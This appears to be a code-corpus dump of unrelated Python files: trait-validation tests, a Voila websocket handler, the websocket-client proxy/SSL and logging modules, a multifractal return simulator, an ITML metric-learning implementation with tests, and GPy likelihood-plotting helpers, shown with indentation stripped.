obj = IntArrayTrait()
_good_values = [1, [1, 2, 3], [[1, 2, 3], [4, 5, 6]], np.array([1])]
_bad_values = [[1, [0, 0]]]
def assertEqual(self, v1, v2):
return np.testing.assert_array_equal(v1, v2)
# Other test cases
class TestArray(TestCase):
def test_array_equal(self):
notifications = []
class Foo(HasTraits):
bar = Array([1, 2])
@observe('bar')
def _(self, change):
notifications.append(change)
foo = Foo()
foo.bar = [1, 2]
self.assertFalse(len(notifications))
foo.bar = [1, 1]
self.assertTrue(len(notifications))
def test_initial_values(self):
class Foo(HasTraits):
a = Array()
b = Array(dtype='int')
c = Array(None, allow_none=True)
d = Array([])
e = Array(Undefined)
foo = Foo()
self.assertTrue(np.array_equal(foo.a, np.array(0)))
self.assertTrue(np.array_equal(foo.b, np.array(0)))
self.assertTrue(foo.c is None)
self.assertTrue(np.array_equal(foo.d, []))
self.assertTrue(foo.e is Undefined)
def test_allow_none(self):
class Foo(HasTraits):
bar = Array()
baz = Array(allow_none=True)
foo = Foo()
with self.assertRaises(TraitError):
foo.bar = None
foo.baz = None
def test_custom_validators(self):
# Test with a squeeze coercion
def squeeze(trait, value):
if 1 in value.shape:
value = np.squeeze(value)
return value
class Foo(HasTraits):
bar = Array().valid(squeeze)
foo = Foo(bar=[[1], [2]])
self.assertTrue(np.array_equal(foo.bar, [1, 2]))
foo.bar = [[1], [2], [3]]
self.assertTrue(np.array_equal(foo.bar, [1, 2, 3]))
# Test with a shape constraint
def shape(*dimensions):
def validator(trait, value):
if value.shape != dimensions:
raise TraitError('Expected an array of shape %s and got an array with shape %s' % (dimensions, value.shape))
else:
return value
return validator
class Foo(HasTraits):
bar = Array(np.identity(2)).valid(shape(2, 2))
foo = Foo()
with self.assertRaises(TraitError):
foo.bar = [1]
new_value = [[0, 1], [1, 0]]
foo.bar = new_value
self.assertTrue(np.array_equal(foo.bar, new_value))
class TestDataFrame(TestCase):
def test_df_equal(self):
notifications = []
class Foo(HasTraits):
bar = DataFrame([1, 2])
@observe('bar')
def _(self, change):
notifications.append(change)
foo = Foo()
foo.bar = [1, 2]
self.assertEqual(notifications, [])
foo.bar = [1, 1]
self.assertEqual(len(notifications), 1)
def test_initial_values(self):
class Foo(HasTraits):
a = DataFrame()
b = DataFrame(None, allow_none=True)
c = DataFrame([])
d = DataFrame(Undefined)
foo = Foo()
self.assertTrue(foo.a.equals(pd.DataFrame()))
self.assertTrue(foo.b is None)
self.assertTrue(foo.c.equals(pd.DataFrame([])))
self.assertTrue(foo.d is Undefined)
def test_allow_none(self):
class Foo(HasTraits):
bar = DataFrame()
baz = DataFrame(allow_none=True)
foo = Foo()
with self.assertRaises(TraitError):
foo.bar = None
foo.baz = None
class TestSeries(TestCase):
def test_series_equal(self):
notifications = []
class Foo(HasTraits):
bar = Series([1, 2])
@observe('bar')
def _(self, change):
notifications.append(change)
foo = Foo()
foo.bar = [1, 2]
self.assertEqual(notifications, [])
foo.bar = [1, 1]
self.assertEqual(len(notifications), 1)
def test_initial_values(self):
class Foo(HasTraits):
a = Series()
b = Series(None, allow_none=True)
c = Series([])
d = Series(Undefined)
foo = Foo()
self.assertTrue(foo.a.equals(pd.Series()))
self.assertTrue(foo.b is None)
self.assertTrue(foo.c.equals(pd.Series([])))
self.assertTrue(foo.d is Undefined)
def test_allow_none(self):
class Foo(HasTraits):
bar = Series()
baz = Series(allow_none=True)
foo = Foo()
with self.assertRaises(TraitError):
foo.bar = None
foo.baz = None
class TestDataset(TestCase):
def test_ds_equal(self):
notifications = []
class Foo(HasTraits):
bar = Dataset({'foo': xr.DataArray([[0, 1, 2], [3, 4, 5]], coords={'x': ['a', 'b']}, dims=('x', 'y')), 'bar': ('x', [1, 2]), 'baz': 3.14})
@observe('bar')
def _(self, change):
notifications.append(change)
foo = Foo()
foo.bar = {'foo': xr.DataArray([[0, 1, 2], [3, 4, 5]], coords={'x': ['a', 'b']}, dims=('x', 'y')), 'bar': ('x', [1, 2]), 'baz': 3.14}
self.assertEqual(notifications, [])
foo.bar = {'foo': xr.DataArray([[0, 1, 2], [3, 4, 5]], coords={'x': ['a', 'b']}, dims=('x', 'y')), 'bar': ('x', [1, 2]), 'baz': 3.15}
self.assertEqual(len(notifications), 1)
def test_initial_values(self):
class Foo(HasTraits):
a = Dataset()
b = Dataset(None, allow_none=True)
d = Dataset(Undefined)
foo = Foo()
self.assertTrue(foo.a.equals(xr.Dataset()))
self.assertTrue(foo.b is None)
self.assertTrue(foo.d is Undefined)
def test_allow_none(self):
class Foo(HasTraits):
bar = Dataset()
baz = Dataset(allow_none=True)
foo = Foo()
with self.assertRaises(TraitError):
foo.bar = None
foo.baz = None
class TestDataArray(TestCase):
def test_ds_equal(self):
notifications = []
class Foo(HasTraits):
bar = DataArray([[0, 1], [2, 3]])
@observe('bar')
def _(self, change):
notifications.append(change)
foo = Foo()
foo.bar = [[0, 1], [2, 3]]
self.assertEqual(notifications, [])
foo.bar = [[0, 1], [2, 4]]
self.assertEqual(len(notifications), 1)
def test_initial_values(self):
class Foo(HasTraits):
b = DataArray(None, allow_none=True)
c = DataArray([])
d = DataArray(Undefined)
foo = Foo()
self.assertTrue(foo.b is None)
self.assertTrue(foo.c.equals(xr.DataArray([])))
self.assertTrue(foo.d is Undefined)
```
#### File: site-packages/voila/query_parameters_handler.py
```python
from tornado.websocket import WebSocketHandler
import logging
from typing import Dict
class QueryStringSocketHandler(WebSocketHandler):
"""A websocket handler used to provide the query string
assocciated with kernel ids in preheat kernel mode.
Class variables
---------------
- _waiters : A dictionary which holds the `websocket` connection
assocciated with the kernel id.
- cache : A dictionary which holds the query string assocciated
with the kernel id.
"""
_waiters = dict()
_cache = dict()
def open(self, kernel_id: str) -> None:
"""Create a new websocket connection, this connection is
identified by the kernel id.
Args:
kernel_id (str): Kernel id used by the notebook when it opens
the websocket connection.
"""
QueryStringSocketHandler._waiters[kernel_id] = self
if kernel_id in self._cache:
self.write_message(self._cache[kernel_id])
def on_close(self) -> None:
for k_id, waiter in QueryStringSocketHandler._waiters.items():
if waiter == self:
break
del QueryStringSocketHandler._waiters[k_id]
@classmethod
def send_updates(cls: 'QueryStringSocketHandler', msg: Dict) -> None:
"""Class method used to dispath the query string to the waiting
notebook. This method is called in `VoilaHandler` when the query
string becomes available.
If this method is called before the opening of websocket connection,
`msg` is stored in `_cache0` and the message will be dispatched when
a notebook with coresponding kernel id is connected.
Args:
- msg (Dict): this dictionary contains the `kernel_id` to identify
the waiting notebook and `payload` is the query string.
"""
kernel_id = msg['kernel_id']
payload = msg['payload']
waiter = cls._waiters.get(kernel_id, None)
if waiter is not None:
try:
waiter.write_message(payload)
except Exception:
logging.error("Error sending message", exc_info=True)
cls._cache[kernel_id] = payload
```
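A minimal wiring sketch, assuming a Tornado application routes a URL pattern capturing the kernel id to this handler; the route and the literal values below are assumptions, and only the message shape `{'kernel_id': ..., 'payload': ...}` comes from `send_updates` above:
```python
# Hypothetical wiring sketch; the route and the literal values are assumptions.
# Only the message shape consumed by send_updates is taken from the class above.
import tornado.web

app = tornado.web.Application([
    (r"/voila/query/(.*)", QueryStringSocketHandler),  # kernel_id captured by the URL
])

# Later, once the query string for a kernel becomes available (e.g. in VoilaHandler):
QueryStringSocketHandler.send_updates(
    {"kernel_id": "abc123", "payload": "foo=1&bar=2"}
)
```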
#### File: site-packages/websocket/_http.py
```python
import errno
import os
import socket
import sys
from ._exceptions import *
from ._logging import *
from ._socket import *
from ._ssl_compat import *
from ._url import *
from base64 import encodebytes as base64encode
__all__ = ["proxy_info", "connect", "read_headers"]
try:
from python_socks.sync import Proxy
from python_socks._errors import *
from python_socks._types import ProxyType
HAVE_PYTHON_SOCKS = True
except:
HAVE_PYTHON_SOCKS = False
class ProxyError(Exception):
pass
class ProxyTimeoutError(Exception):
pass
class ProxyConnectionError(Exception):
pass
class proxy_info:
def __init__(self, **options):
self.proxy_host = options.get("http_proxy_host", None)
if self.proxy_host:
self.proxy_port = options.get("http_proxy_port", 0)
self.auth = options.get("http_proxy_auth", None)
self.no_proxy = options.get("http_no_proxy", None)
self.proxy_protocol = options.get("proxy_type", "http")
# Note: If timeout not specified, default python-socks timeout is 60 seconds
self.proxy_timeout = options.get("timeout", None)
if self.proxy_protocol not in ['http', 'socks4', 'socks4a', 'socks5', 'socks5h']:
raise ProxyError("Only http, socks4, socks5 proxy protocols are supported")
else:
self.proxy_port = 0
self.auth = None
self.no_proxy = None
self.proxy_protocol = "http"
def _start_proxied_socket(url, options, proxy):
if not HAVE_PYTHON_SOCKS:
raise WebSocketException("Python Socks is needed for SOCKS proxying but is not available")
hostname, port, resource, is_secure = parse_url(url)
if proxy.proxy_protocol == "socks5":
rdns = False
proxy_type = ProxyType.SOCKS5
if proxy.proxy_protocol == "socks4":
rdns = False
proxy_type = ProxyType.SOCKS4
# socks5h and socks4a send DNS through proxy
if proxy.proxy_protocol == "socks5h":
rdns = True
proxy_type = ProxyType.SOCKS5
if proxy.proxy_protocol == "socks4a":
rdns = True
proxy_type = ProxyType.SOCKS4
ws_proxy = Proxy.create(
proxy_type=proxy_type,
host=proxy.proxy_host,
port=int(proxy.proxy_port),
username=proxy.auth[0] if proxy.auth else None,
password=proxy.auth[1] if proxy.auth else None,
rdns=rdns)
sock = ws_proxy.connect(hostname, port, timeout=proxy.proxy_timeout)
if is_secure and HAVE_SSL:
sock = _ssl_socket(sock, options.sslopt, hostname)
elif is_secure:
raise WebSocketException("SSL not available.")
return sock, (hostname, port, resource)
def connect(url, options, proxy, socket):
# Use _start_proxied_socket() only for socks4 or socks5 proxy
# Use _tunnel() for http proxy
# TODO: Use python-socks for http protocol also, to standardize flow
if proxy.proxy_host and not socket and not (proxy.proxy_protocol == "http"):
return _start_proxied_socket(url, options, proxy)
hostname, port, resource, is_secure = parse_url(url)
if socket:
return socket, (hostname, port, resource)
addrinfo_list, need_tunnel, auth = _get_addrinfo_list(
hostname, port, is_secure, proxy)
if not addrinfo_list:
raise WebSocketException(
"Host not found.: " + hostname + ":" + str(port))
sock = None
try:
sock = _open_socket(addrinfo_list, options.sockopt, options.timeout)
if need_tunnel:
sock = _tunnel(sock, hostname, port, auth)
if is_secure:
if HAVE_SSL:
sock = _ssl_socket(sock, options.sslopt, hostname)
else:
raise WebSocketException("SSL not available.")
return sock, (hostname, port, resource)
except:
if sock:
sock.close()
raise
def _get_addrinfo_list(hostname, port, is_secure, proxy):
phost, pport, pauth = get_proxy_info(
hostname, is_secure, proxy.proxy_host, proxy.proxy_port, proxy.auth, proxy.no_proxy)
try:
# when running on windows 10, getaddrinfo without socktype returns a socktype 0.
# This generates an error exception: `_on_error: exception Socket type must be stream or datagram, not 0`
# or `OSError: [Errno 22] Invalid argument` when creating socket. Force the socket type to SOCK_STREAM.
if not phost:
addrinfo_list = socket.getaddrinfo(
hostname, port, 0, socket.SOCK_STREAM, socket.SOL_TCP)
return addrinfo_list, False, None
else:
pport = pport and pport or 80
# when running on windows 10, the getaddrinfo used above
# returns a socktype 0. This generates an error exception:
# _on_error: exception Socket type must be stream or datagram, not 0
# Force the socket type to SOCK_STREAM
addrinfo_list = socket.getaddrinfo(phost, pport, 0, socket.SOCK_STREAM, socket.SOL_TCP)
return addrinfo_list, True, pauth
except socket.gaierror as e:
raise WebSocketAddressException(e)
def _open_socket(addrinfo_list, sockopt, timeout):
err = None
for addrinfo in addrinfo_list:
family, socktype, proto = addrinfo[:3]
sock = socket.socket(family, socktype, proto)
sock.settimeout(timeout)
for opts in DEFAULT_SOCKET_OPTION:
sock.setsockopt(*opts)
for opts in sockopt:
sock.setsockopt(*opts)
address = addrinfo[4]
err = None
while not err:
try:
sock.connect(address)
except socket.error as error:
error.remote_ip = str(address[0])
try:
eConnRefused = (errno.ECONNREFUSED, errno.WSAECONNREFUSED)
except:
eConnRefused = (errno.ECONNREFUSED, )
if error.errno == errno.EINTR:
continue
elif error.errno in eConnRefused:
err = error
continue
else:
if sock:
sock.close()
raise error
else:
break
else:
continue
break
else:
if err:
raise err
return sock
def _wrap_sni_socket(sock, sslopt, hostname, check_hostname):
context = sslopt.get('context', None)
if not context:
context = ssl.SSLContext(sslopt.get('ssl_version', ssl.PROTOCOL_TLS_CLIENT))
if sslopt.get('cert_reqs', ssl.CERT_NONE) != ssl.CERT_NONE:
cafile = sslopt.get('ca_certs', None)
capath = sslopt.get('ca_cert_path', None)
if cafile or capath:
context.load_verify_locations(cafile=cafile, capath=capath)
elif hasattr(context, 'load_default_certs'):
context.load_default_certs(ssl.Purpose.SERVER_AUTH)
if sslopt.get('certfile', None):
context.load_cert_chain(
sslopt['certfile'],
sslopt.get('keyfile', None),
sslopt.get('password', None),
)
# Python 3.10 switch to PROTOCOL_TLS_CLIENT defaults to "cert_reqs = ssl.CERT_REQUIRED" and "check_hostname = True"
# If both disabled, set check_hostname before verify_mode
# see https://github.com/liris/websocket-client/commit/b96a2e8fa765753e82eea531adb19716b52ca3ca#commitcomment-10803153
if sslopt.get('cert_reqs', ssl.CERT_NONE) == ssl.CERT_NONE and not sslopt.get('check_hostname', False):
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
else:
context.check_hostname = sslopt.get('check_hostname', True)
context.verify_mode = sslopt.get('cert_reqs', ssl.CERT_REQUIRED)
if 'ciphers' in sslopt:
context.set_ciphers(sslopt['ciphers'])
if 'cert_chain' in sslopt:
certfile, keyfile, password = sslopt['cert_chain']
context.load_cert_chain(certfile, keyfile, password)
if 'ecdh_curve' in sslopt:
context.set_ecdh_curve(sslopt['ecdh_curve'])
return context.wrap_socket(
sock,
do_handshake_on_connect=sslopt.get('do_handshake_on_connect', True),
suppress_ragged_eofs=sslopt.get('suppress_ragged_eofs', True),
server_hostname=hostname,
)
def _ssl_socket(sock, user_sslopt, hostname):
sslopt = dict(cert_reqs=ssl.CERT_REQUIRED)
sslopt.update(user_sslopt)
certPath = os.environ.get('WEBSOCKET_CLIENT_CA_BUNDLE')
if certPath and os.path.isfile(certPath) \
and user_sslopt.get('ca_certs', None) is None:
sslopt['ca_certs'] = certPath
elif certPath and os.path.isdir(certPath) \
and user_sslopt.get('ca_cert_path', None) is None:
sslopt['ca_cert_path'] = certPath
if sslopt.get('server_hostname', None):
hostname = sslopt['server_hostname']
check_hostname = sslopt.get('check_hostname', True)
sock = _wrap_sni_socket(sock, sslopt, hostname, check_hostname)
return sock
def _tunnel(sock, host, port, auth):
debug("Connecting proxy...")
connect_header = "CONNECT %s:%d HTTP/1.1\r\n" % (host, port)
connect_header += "Host: %s:%d\r\n" % (host, port)
# TODO: support digest auth.
if auth and auth[0]:
auth_str = auth[0]
if auth[1]:
auth_str += ":" + auth[1]
encoded_str = base64encode(auth_str.encode()).strip().decode().replace('\n', '')
connect_header += "Proxy-Authorization: Basic %s\r\n" % encoded_str
connect_header += "\r\n"
dump("request header", connect_header)
send(sock, connect_header)
try:
status, resp_headers, status_message = read_headers(sock)
except Exception as e:
raise WebSocketProxyException(str(e))
if status != 200:
raise WebSocketProxyException(
"failed CONNECT via proxy status: %r" % status)
return sock
def read_headers(sock):
status = None
status_message = None
headers = {}
trace("--- response header ---")
while True:
line = recv_line(sock)
line = line.decode('utf-8').strip()
if not line:
break
trace(line)
if not status:
status_info = line.split(" ", 2)
status = int(status_info[1])
if len(status_info) > 2:
status_message = status_info[2]
else:
kv = line.split(":", 1)
if len(kv) == 2:
key, value = kv
if key.lower() == "set-cookie" and headers.get("set-cookie"):
headers["set-cookie"] = headers.get("set-cookie") + "; " + value.strip()
else:
headers[key.lower()] = value.strip()
else:
raise WebSocketException("Invalid header")
trace("-----------------------")
return status, headers, status_message
```
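For reference, a hedged sketch of the proxy options consumed by `proxy_info` above; the host, port and credentials are placeholders, but the option keys are exactly the ones read in `proxy_info.__init__`:
```python
# Sketch only: option keys mirror what proxy_info.__init__ reads above;
# the host, port and credentials are placeholder values.
socks_proxy = proxy_info(
    http_proxy_host="127.0.0.1",          # proxy address
    http_proxy_port=1080,                 # proxy port
    http_proxy_auth=("user", "secret"),   # (username, password) tuple
    proxy_type="socks5h",                 # DNS resolution done by the proxy
    timeout=30,                           # python-socks timeout in seconds
)
```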
#### File: site-packages/websocket/_logging.py
```python
import logging
_logger = logging.getLogger('websocket')
try:
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
_logger.addHandler(NullHandler())
_traceEnabled = False
__all__ = ["enableTrace", "dump", "error", "warning", "debug", "trace",
"isEnabledForError", "isEnabledForDebug", "isEnabledForTrace"]
def enableTrace(traceable, handler=logging.StreamHandler()):
"""
Turn on/off the traceability.
Parameters
----------
traceable: bool
If set to True, traceability is enabled.
"""
global _traceEnabled
_traceEnabled = traceable
if traceable:
_logger.addHandler(handler)
_logger.setLevel(logging.DEBUG)
def dump(title, message):
if _traceEnabled:
_logger.debug("--- " + title + " ---")
_logger.debug(message)
_logger.debug("-----------------------")
def error(msg):
_logger.error(msg)
def warning(msg):
_logger.warning(msg)
def debug(msg):
_logger.debug(msg)
def trace(msg):
if _traceEnabled:
_logger.debug(msg)
def isEnabledForError():
return _logger.isEnabledFor(logging.ERROR)
def isEnabledForDebug():
return _logger.isEnabledFor(logging.DEBUG)
def isEnabledForTrace():
return _traceEnabled
``` |
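A short usage sketch for the helpers above; enabling trace attaches a `StreamHandler` and switches the module logger to `DEBUG`, after which `dump` and `trace` produce output:
```python
# Usage sketch for the logging helpers defined above.
enableTrace(True)                            # attach a StreamHandler, set DEBUG level
dump("request header", "GET / HTTP/1.1")     # emitted only while tracing is enabled
trace("handshake complete")
enableTrace(False)                           # dump/trace become no-ops again
```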
{
"source": "johncollinsedhec/markov-switching-multifractal",
"score": 2
} |
#### File: johncollinsedhec/markov-switching-multifractal/simulatedata.py
```python
import numpy as np
def simulatedata(b,m0,gamma_kbar,sig,kbar,T):
m0 = m0
m1 = 2-m0
g_s = np.zeros(kbar)
M_s = np.zeros((kbar,T))
g_s[0] = 1-(1-gamma_kbar)**(1/(b**(kbar-1)))
for i in range(1,kbar):
g_s[i] = 1-(1-g_s[0])**(b**(i))
for j in range(kbar):
M_s[j,:] = np.random.binomial(1,g_s[j],T)
dat = np.zeros(T)
tmp = (M_s[:,0]==1)*m1+(M_s[:,0]==0)*m0
dat[0] = np.prod(tmp)
for k in range(1,T):
for j in range(kbar):
if M_s[j,k]==1:
tmp[j] = np.random.choice([m0,m1],1,p = [0.5,0.5])
dat[k] = np.prod(tmp)
dat = np.sqrt(dat)*sig* np.random.normal(size = T) # VOL TIME SCALING
dat = dat.reshape(-1,1)
return(dat)
``` |
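A usage sketch for the simulator above, assuming the function is importable; the parameter values are illustrative placeholders, but the argument order follows the signature `simulatedata(b, m0, gamma_kbar, sig, kbar, T)`:
```python
# Illustrative parameter values only; argument order follows the signature above.
import numpy as np

np.random.seed(0)
returns = simulatedata(b=3.0, m0=1.4, gamma_kbar=0.5, sig=0.01, kbar=5, T=1000)
print(returns.shape)  # (1000, 1): simulated MSM return series
```
Note that `m0` must lie in (0, 2) so that the second multiplier state `m1 = 2 - m0` stays positive and the square root in the volatility scaling is well defined.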
{
"source": "johncollins/metric-learn",
"score": 3
} |
#### File: metric_learn/itml/ItmlAlgorithm.py
```python
from ..MetricLearningAlgorithm import MetricLearningAlgorithm
from numba.decorators import jit, autojit
from numba import double
from utils import compute_distance_extremes, get_constraints
import numba
import numpy as np
class ItmlAlgorithm(MetricLearningAlgorithm):
"""
Implementation of Information Theoretic Metric Learning
Kulis et. al
#TODO: Add more reference materials
"""
def set_default_parameters(self):
self.parameters = {
'gamma' : 1.0,
'beta' : 1.0,
'constant_factor' : 40.0,
'type4_rank' : 5.0,
'thresh' : 10e-5,
'k' : 4,
'max_iters' : 100000,
'lower_percentile': 5,
'upper_percentile': 95,
'A0': np.eye(self.X.shape[1]),
'verbose': True
}
def run_algorithm_specific_setup(self):
self.l, self.u = compute_distance_extremes(self.X, self.parameters['lower_percentile'],
self.parameters['upper_percentile'], np.eye(self.X.shape[1]))
num_constraints = int(self.parameters['constant_factor'] * (max(self.y.shape) * (max(self.y.shape))-1))
self.constraints = get_constraints(self.y, num_constraints, self.l, self.u)
# check to make sure that no pair of constrained vectors
# are identical. If they are, remove the constraint
#TODO: Clean this up and make it pythonic
#invalid = []
#for i, c in enumerate(C):
# i1, i2 = C[i, :2]
# v = X[i1, :] - X[i2, :]
# if np.linalg.norm(v) < 10e-10:
# invalid.append(i)
#C = np.delete(C, invalid, 0)
#print self.constraints
valid = np.array([np.linalg.norm(self.X[c[0],:] - self.X[c[1],:]) > 10e-10 for c in self.constraints])
#print valid
self.constraints = self.constraints[valid,:]
self.A0 = self.parameters['A0']
def learn_metric(self):
tol, gamma, max_iters = self.parameters['thresh'], self.parameters['gamma'], self.parameters['max_iters']
C = self.constraints
X, y = self.X, self.y
i = 0
iteration = 0
c = C.shape[0]
lambdacurrent = np.zeros((c))
bhat = np.array(C[:,3])
lambdaold = np.array(lambdacurrent)
converged = np.inf
A = np.matrix(self.A0)
verbose = self.parameters['verbose']
while True:
V = np.asmatrix(X[C[i, 0], :] - X[C[i, 1], :]).T # column vector x - y
wtw = (V.T * A * V)[0, 0] # a scalar
if np.abs(bhat[i]) < 10e-10:
print('bhat should never be 0!')
exit()
if gamma == np.inf:
gamma_proj = 1
else:
gamma_proj = gamma / (gamma + 1)
if C[i, 2] == 1: # lower bound constraint
alpha = min(lambdacurrent[i], gamma_proj * (1.0 / (wtw) - 1.0 / bhat[i]))
lambdacurrent[i] = lambdacurrent[i] - alpha
beta = alpha / (1 - alpha * wtw)
bhat[i] = 1.0 / ((1.0 / bhat[i]) + (alpha / gamma))
elif C[i, 2] == -1: # upper bound constraint
alpha = min(lambdacurrent[i], gamma_proj * (1.0 / bhat[i] - 1.0 / wtw))
lambdacurrent[i] = lambdacurrent[i] - alpha
beta = -1 * alpha / (1 + alpha * wtw)
bhat[i] = 1.0 / ((1.0 / bhat[i]) - (alpha / gamma))
A += beta * A * (V * V.T) * A # non-numba version
# A = update(A, V, beta) # numba version not working
if i == c - 1:
normsum = np.linalg.norm(lambdacurrent) + np.linalg.norm(lambdaold)
if normsum == 0:
break
else:
converged = np.linalg.norm(lambdaold - lambdacurrent, ord = 1) / normsum
if (converged < tol) or (iteration > max_iters):
break
lambdaold = np.array(lambdacurrent)
i = ((i+1) % c)
iteration += 1
if iteration % 5000 == 0 and verbose:
print('itml iter: %d, converged = %f' % (iteration, converged))
if verbose:
print('itml converged to tol: %f, iteration: %d' % (converged, iteration))
return np.asarray(A)
"""
@autojit
def update(A, V, beta):
return A + beta * A * (V * V.T) * A
@jit(argtypes=(double[:,:],double[:,:],double))
def update2(A, V, beta):
return A + beta * A * (V * V.T) * A
"""
```
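A hypothetical usage sketch; the constructor signature (`X`, `y`, optional `parameters` dict) mirrors the way the base class is exercised in `test_MetricLearningAlgorithm.py` below, and the data are synthetic placeholders rather than a recommended benchmark:
```python
# Hypothetical usage sketch; data are synthetic placeholders.
import numpy as np

rng = np.random.RandomState(0)
X = np.vstack([rng.randn(20, 3), rng.randn(20, 3) + 2.0])  # two loose clusters
y = np.array([0] * 20 + [1] * 20)                          # class labels

itml = ItmlAlgorithm(X, y, parameters={'verbose': False})
A = itml.learn_metric()   # learned Mahalanobis matrix, shape (3, 3)
```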
#### File: itml/test/test_utils.py
```python
from ..utils import compute_distance_extremes, get_constraints
import numpy as np
import random
from nose.tools import assert_equal
class TestUtils(object):
def __init__(self):
random.seed(0)
self.X = np.array([[1, 10, 1], [3, 6, 7], [9, 11, 1], [1, 2, 1]])
self.lower, self.upper = 20, 80
self.M = np.eye(self.X.shape[1])
def test_compute_distance_extremes(self):
self.l, self.u = compute_distance_extremes(self.X, self.lower, self.upper, self.M)
assert_equal(self.l, 28.275)
assert_equal(self.u, 115.275)
```
#### File: metric_learn/itml/utils.py
```python
def compute_distance_extremes(X, a, b, M):
"""
Usage:
from compute_distance_extremes import compute_distance_extremes
(l, u) = compute_distance_extremes(X, a, b, M)
Computes sample histogram of the distances between rows of X and returns
the value of these distances at the a^th and b^th percentiles. This
method is used to determine the upper and lower bounds for
similarity / dissimilarity constraints.
Args:
X: (n x m) data matrix
a: lower bound percentile between 1 and 100
b: upper bound percentile between 1 and 100
M: Mahalanobis matrix to compute distances
Returns:
l: distance corresponding to a^th percentile
u: distance corresponding to the b^th percentile
"""
import numpy as np
import random
random.seed(0)
if (a < 1) or (a > 100):
raise Exception('a must be between 1 and 100')
if (b < 1) or (b > 100):
raise Exception('b must be between 1 and 100')
n = X.shape[0]
num_trials = min(100, n * (n - 1) / 2);
# sample with replacement
dists = np.zeros((num_trials, 1))
for i in xrange(num_trials):
j1 = np.floor(random.uniform(0, n))
j2 = np.floor(random.uniform(0, n))
dists[i] = np.dot(np.dot((X[j1, :] - X[j2, :]), M), (X[j1, :] - X[j2, :]).T)
# return frequencies and bin extremeties
(f, ext) = np.histogram(dists, bins = 100) # specify bins by percentile
# get bin centers
c = [(ext[i]+float(ext[i+1])) / 2 for i in xrange(len(ext) - 1)]
# get values at percentiles
l = c[int(np.floor(a)) - 1] # get counts for lower percentile
u = c[int(np.floor(b)) - 1] # get counts for higher percentile
return l, u
def get_constraints(y, num_constraints, l, u):
"""
get_constraints(y, num_constraints, l, u)
Get ITML constraint matrix from true labels.
"""
import numpy as np
import random
random.seed(0)
# Make quartets for pairs of indices [index1, index2, 1 or -1, l or u]
# Note that l always goes with 1 and u always goes with -1
m = len(y)
C = np.zeros((num_constraints, 4))
for k in xrange(num_constraints):
i = np.floor(random.uniform(0, m))
j = np.floor(random.uniform(0, m))
if y[i] == y[j]:
C[k, :] = (i, j, 1, l)
else:
C[k, :] = (i, j, -1, u)
return np.array(C)
```
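A short sketch showing the two helpers together; the values are illustrative, and since this module uses `xrange`, the sketch assumes a Python 2 interpreter like the surrounding code:
```python
# Illustrative sketch (Python 2, like the module above); values are placeholders.
import numpy as np

X = np.array([[1, 10, 1], [3, 6, 7], [9, 11, 1], [1, 2, 1]], dtype=float)
y = np.array([0, 0, 1, 1])

l, u = compute_distance_extremes(X, 5, 95, np.eye(X.shape[1]))
C = get_constraints(y, 10, l, u)
# Each row of C is [i, j, +/-1, bound]: +1 with bound l for same-label pairs,
# -1 with bound u for different-label pairs.
```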
#### File: metric_learn/test/test_MetricLearningAlgorithm.py
```python
import scipy.linalg
from ..MetricLearningAlgorithm import MetricLearningAlgorithm
from nose.tools import assert_raises, assert_equal
import numpy as np
class TestMetricLearningAlgorithm(object):
def __init__(self):
self.X = np.array([[1, 2, 3], [4, 5, 6]])
self.y = [1, 2]
def test_instantiation(self):
assert_raises(TypeError, MetricLearningAlgorithm, self.X, self.y)
MLA = ConcreteMetricLearningAlgorithm(self.X, self.y, parameters = {'s': [3, 2, 1], 'tenor': 54})
print MLA.parameters.keys()
assert_equal(MLA.parameters['s'], [3, 2, 1])
assert_equal(MLA.parameters['tenor'], 54)
assert_equal(MLA.foo, 'bar')
MLA = ConcreteMetricLearningAlgorithm(self.X, self.y)
print MLA.parameters
assert_equal(MLA.parameters['s'], [1, 2, 3])
assert_equal(MLA.parameters['tenor'], 45)
assert_equal(MLA.foo, 'bar')
class ConcreteMetricLearningAlgorithm(MetricLearningAlgorithm):
"""
For testing the abstract MetricLearningAlgorithm class
"""
def set_default_parameters(self):
self.parameters = {'s': [1,2,3], 'tenor': 45, 'sax': 90}
def run_algorithm_specific_setup(self):
self.foo = 'bar'
def learn_metric(self):
return np.eye(3)
``` |
{
"source": "johncoltrane1/saferGPMLE",
"score": 2
} |
#### File: libs/utils/gpy_plotting_lib.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import math
import libs.utils.gpy_finite_diff as gpy_finite_diff
import libs.utils.gpy_estimation_lib as gpy_estimation_lib
from GPy.util.linalg import pdinv, dpotrs
from GPy.util import diag
import sklearn.linear_model
def plot_paramz_likelihood_path(model, label):
nominal = np.array([27.04301504, 83.37540132])
param_one = nominal.copy()
param_two = model.X.std(0)
scipy_param_one = model.kern.lengthscale.constraints.properties()[0].finv(param_one)
scipy_param_two = model.kern.lengthscale.constraints.properties()[0].finv(param_two)
grid_1d = np.linspace(-0.3, 1.5, 1000)
y_1d = []
for i in range(grid_1d.shape[0]):
x = grid_1d[i]
scipy_param = x * scipy_param_one + (1 - x) * scipy_param_two
model.kern.lengthscale.optimizer_array = scipy_param.copy()
model = gpy_estimation_lib.analytical_mean_and_variance_optimization(model)
y_1d.append(model.objective_function())
plt.plot(grid_1d, y_1d, label=label)
def plot_likelihood_path(model, estimate_mean=True, estimate_var=True):
param_one = np.array([27.04301504, 83.37540132])
param_two = np.array([8.76182561, 21.70946319])
mean_one = 1210.116506
variance_one = 2274398.204448
mean_two = 176.754115
variance_two = 18221.51397
grid_1d = np.linspace(0, 1, 1000)
y_1d = []
gradient_norm = []
for i in range(grid_1d.shape[0]):
x = grid_1d[i]
param = x * param_one + (1 - x) * param_two
if estimate_mean:
mean_value = None
else:
mean_value = np.array([[x * mean_one + (1 - x) * mean_two]])
if estimate_var:
variance_value = None
else:
variance_value = np.array([[x * variance_one + (1 - x) * variance_two]])
obj, grad, hessian, model = gpy_finite_diff.get_cost_and_grad_and_hessian(model, param, mean_value, variance_value)
if i == 0:
print("first mode, obj : {}, grad : {}, hessian : \n {}, \n spec hessian : {}".format(obj, grad,
hessian,
np.linalg.eig(
hessian)[0]))
elif i == grid_1d.shape[0] - 1:
print("second mode, obj : {}, grad : {}, hessian : \n {}, \n spec hessian : {}".format(obj, grad,
hessian,
np.linalg.eig(
hessian)[0]))
y_1d.append(obj)
gradient_norm.append((grad ** 2).sum())
plot_xaxis = "path : lengthscales"
if not estimate_mean:
plot_xaxis = plot_xaxis + ', mean'
if not estimate_var:
plot_xaxis = plot_xaxis + ', var'
plt.figure()
